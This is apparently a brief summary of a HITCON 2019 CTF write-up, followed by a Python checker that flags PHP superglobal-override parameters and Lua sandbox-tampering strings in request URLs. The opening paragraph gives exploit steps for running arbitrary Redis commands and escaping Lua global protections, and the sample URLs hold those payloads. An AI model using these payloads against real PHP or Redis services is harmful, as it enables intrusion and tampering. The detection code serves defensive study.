Execute arbitrary Redis commands by passing `_POST[MY_SET_COMMAND]=<command>&_POST[TEST_KEY]=<arg1>&_POST[TEST_VALUE]=<arg2>` in the query string. Use `setmetatable(_G, nil)` to circumvent the global protections in Redis, and finally redefine `math.random` using `for k, v in pairs(math) do rawset(math, k, function() return 4 end) end`, which overwrites every entry in `math`, `math.random` included.
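
A defender-side check for the two indicators above, as an added example that is not part of the original writeup: it flags query-string parameters named after PHP superglobals and values containing the Lua `setmetatable(_G, ...)` and `rawset` constructs. The function name, finding labels and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP superglobal names. A request parameter named like one of these suggests
# an attempt to overwrite it, as with the writeup's `_POST[...]` query string.
SUPERGLOBAL_KEY = re.compile(
    r"^_(GET|POST|COOKIE|REQUEST|SERVER|SESSION|FILES|ENV)(\[|$)"
)

# Lua constructs named in the writeup: dropping the metatable on _G and
# rewriting entries of a library table with rawset.
LUA_TAMPERING = [
    ("global metatable removed", re.compile(r"setmetatable\s*\(\s*_G\s*,")),
    ("library table rewritten", re.compile(r"rawset\s*\(\s*(math|string|table|_G)\s*,")),
]


def inspect_request(url):
    """Return a sorted list of findings for one request URL (hypothetical helper)."""
    findings = set()
    query = urlsplit(url).query
    # parse_qsl percent-decodes names and values, so %5B / %5D are handled.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_KEY.match(name):
            findings.add("superglobal override: " + name.split("[")[0])
        for label, pattern in LUA_TAMPERING:
            if pattern.search(value):
                findings.add("lua: " + label)
    return sorted(findings)


# Constructed sample request URLs, not taken from real traffic.
SAMPLES = [
    "/index.php?token=abc&guess=3",
    "/index.php?_POST%5BTEST_KEY%5D=k&_POST%5BTEST_VALUE%5D=v",
    "/index.php?_POST[TEST_VALUE]=setmetatable(_G%2C%20nil)",
    "/index.php?note=for+k,v+in+pairs(math)+do+rawset(math,k,f)+end",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", inspect_request(url) or "clean")
```
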

Original writeup (https://smyghalloumi.se/posts/2019-10-14-hitcon2019-luatic.html).